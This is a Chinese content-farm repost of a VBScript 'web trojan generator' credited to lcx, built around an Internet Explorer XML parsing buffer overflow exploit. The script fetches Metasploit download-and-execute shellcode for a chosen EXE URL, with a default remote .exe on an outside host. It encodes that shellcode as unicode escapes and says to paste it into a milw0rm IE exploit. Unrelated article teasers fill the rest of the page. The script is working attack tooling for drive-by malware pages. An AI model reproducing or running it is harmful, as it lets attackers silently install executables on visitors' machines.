网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day分享

小多 • 2022年8月23日上午8:49 • 投稿

‘code by lcx

On Error Resume Next Exeurl = InputBox( “请输入exe的地址：”, “输入”, “http://www.haiyangtop.net/333.exe” ) url=”http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL=”&URLEn%ignore_a_1%(Exeurl)&”&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload”

Body = getHTTPPage(url) Set Re = New RegExp Re.Pattern = “($shellcode =[sS]+</div></pre>)”

Set Matches = Re.Execute(Body) If Matches.Count>0 Then Body = Matches(0).value

code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,”$shellcode =”,””),Chr(34),””),Chr(13),””),”;”,””),”</div></pre>”,””),Chr(10),””),”.”,””))

function replaceregex(str) set regex=new regExp regex.pattern=”\\x(..)\\x(..)” regex.IgnoreCase=true regex.global=true matches=regex.replace(str,”%u$2$1″) replaceregex=matches end Function

Function getHTTPPage(Path) t = GetBody(Path) getHTTPPage = BytesToBstr(t, “GB2312”) End Function

Function GetBody(url) On Error Resume Next Set Retrieval = CreateObject(“Microsoft.XMLHTTP”) With Retrieval .Open “Get”, url, False, “”, “” .Send GetBody = .ResponseBody End With Set Retrieval = Nothing End Function

Function BytesToBstr(Body, Cset) Dim objstream Set objstream = CreateObject(“adodb.stream”) objstream.Type = 1 objstream.Mode = 3 objstream.Open objstream.Write Body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadText objstream.Close Set objstream = Nothing End Function

Function URLEncoding(vstrIn) strReturn = “” For aaaa = 1 To Len(vstrIn) ThisChr = Mid(vStrIn,aaaa,1) If Abs(Asc(ThisChr)) < &HFF Then strReturn = strReturn & ThisChr Else innerCode = Asc(ThisChr) If innerCode < 0 Then innerCode = innerCode + &H10000 End If Hight8 = (innerCode And &HFF00) &HFF Low8 = innerCode And &HFF strReturn = strReturn & “%” & Hex(Hight8) & “%” & Hex(Low8) End If Next URLEncoding = strReturn End Function

set fso=CreateObject(“scripting.filesystemobject”) set fileS=fso.opentextfile(“a.txt”,2,true) fileS.writeline replaceregex(code) ‘fileS.writeline body wscript.echo replaceregex(code) files.close set fso=Nothing

wscript.echo Chr(13)&”ok，生成a.txt，请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可”

—-想了解更多的linux相关异常处理怎么解决关注

小多注册用户

0 0

单字情侣名字一对简洁分享！

上一篇 2022年8月23日上午8:42

蒸汽平台-《CSGO》国服-启动器-独立于Steam

下一篇 2022年8月23日上午8:54

投稿

歌手里的观众是些什么人

歌手里的观众是些什么人歌手里的观众大多是喜欢听歌、钟爱音乐的人，他们有许多共同的特点：首先，他们都喜欢音乐，他们热衷于欣赏歌手唱歌的能力。这些观众也很有耐心，他们喜欢在现场演出…

一时点萝卜
2023年7月18日
投稿

巴别鱼口语一点通（关于巴别鱼口语一点通的介绍）

大家好，小节来为大家解答以上的问题。巴别鱼口语一点通，关于巴别鱼口语一点通的介绍很多人还不知道，现在让我们一起来看看吧！ 1、《口语一点通V900》是一种独创“全景浸入式学习法”，…

无非
2024年3月18日
投稿

利辛一中（关于利辛一中的介绍）

大家好，小节来为大家解答以上的问题。利辛一中，关于利辛一中的介绍很多人还不知道，现在让我们一起来看看吧！ 1、利辛一中创建于1958年。 2、现为安徽省示范高中、全国消防安全教育示…

无非
2023年1月14日
投稿

100300元大写怎么写（正确的大写100元是怎么写原因是什么）

您好,今天帅帅来为大家解答以上的问题。100300元大写怎么写，正确的大写100元是怎么写原因是什么相信很多小伙伴还不知道,现在让我们一起来看看吧！ 1、大写100元写作壹佰圆。…

无非
2023年10月23日
投稿

君客（关于君客的介绍）

大家好，小节来为大家解答以上的问题。君客，关于君客的介绍很多人还不知道，现在让我们一起来看看吧！ 1、歌行，中国古典诗歌的一种体裁。 2、属乐府诗一类，汉魏以后的乐府诗，题名为“歌…

无非
2024年1月29日
投稿

好看什么动物的电影

好看什么动物的电影好看的动物电影有很多，从古老的《猫和老鼠》，到经典的《安德的游戏》，再到最新的《狮子王》，都是很受欢迎的动物电影。从动画电影来看，《猫和老鼠》是一部受人喜爱的…

一时点萝卜
2023年7月21日
投稿

民歌经典 (民歌经典歌曲大全免费听)

本文目录一览： 1、中国十大经典民歌2、民歌经典歌曲3、民歌经典歌曲大全十大经典民歌介绍4、经典又好听的民歌有哪些？5、有哪些经典民歌比较好听？中国十大经典民歌 1、《山丹丹开花…

趣科普
2022年11月8日
投稿

张杰iu在什么合作过

张杰iu在什么合作过张杰iu合作过很多作品，其中包括电视剧、电影、歌曲以及综艺节目。从电视剧方面来看，张杰iu曾参演《武林外传》、《逆袭之星途璀璨》、《隋唐演义》、《爱情公寓3…

一时点萝卜
2023年6月19日
投稿

超级食人鱼怎么样

超级食人鱼怎么样超级食人鱼是一种特殊的食人鱼，它们与普通的食人鱼有很多不同之处。它们的体积比普通的食人鱼大得多，它们的外表也更加醒目，因此它们很容易吸引人们的目光。超级食人鱼可以…

一时点萝卜
2023年6月14日
投稿

天津到北京多少公里路程（天津到北京多少公里）

您好,今天帅帅来为大家解答以上的问题。天津到北京多少公里路程，天津到北京多少公里相信很多小伙伴还不知道,现在让我们一起来看看吧！ 1、天津市政府出发，到北京市政府，根据百度地图显示…

无非
2023年1月17日
投稿

西瓜花芯有虫怎么办

西瓜花芯有虫怎么办西瓜花芯有虫的话，一般来说，最好的办法就是防治，也就是采取措施防止虫害的发生。首先，需要定期对花芯进行检查，如果发现花芯有虫，及时采取措施，如果种植西瓜的地方有…

一时点萝卜
2023年6月11日
投稿

核按钮是什么时候开始有的（核按钮是什么意思）

您好,今天帅帅来为大家解答以上的问题。核按钮是什么时候开始有的，核按钮是什么意思相信很多小伙伴还不知道,现在让我们一起来看看吧！ 1、“核按钮”只是一种能发出核攻击命令的特殊通讯设…

无非
2024年1月1日
投稿

网页不显示图片怎么解决（网页不显示图片怎么解决）

您好,今天帅帅来为大家解答以上的问题。网页不显示图片怎么解决，网页不显示图片怎么解决相信很多小伙伴还不知道,现在让我们一起来看看吧！ 1、看看是不是手机的网络不好，或者是重启手机看…

无非
2023年11月11日
投稿

山梨糖醇是什么添加剂（山梨糖醇是什么）

您好,今天帅帅来为大家解答以上的问题。山梨糖醇是什么添加剂，山梨糖醇是什么相信很多小伙伴还不知道,现在让我们一起来看看吧！ 1、山梨糖醇是一种糖分，在生活中是比较常见的，山梨糖醇是…

无非
2023年12月24日
投稿

physx选择显卡还是自动游戏电脑问题解决分享！

GTX860M是支持Physx物理加速的，选择GTX860M，如果不会选那就自动，让%ignore_a_1%或者软件自行选择。自动即可，电脑会在低强度工作时使用cpu内置的集成显…

小多
2022年11月27日

发表回复

登录后才能评论

网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day分享

相关推荐

发表回复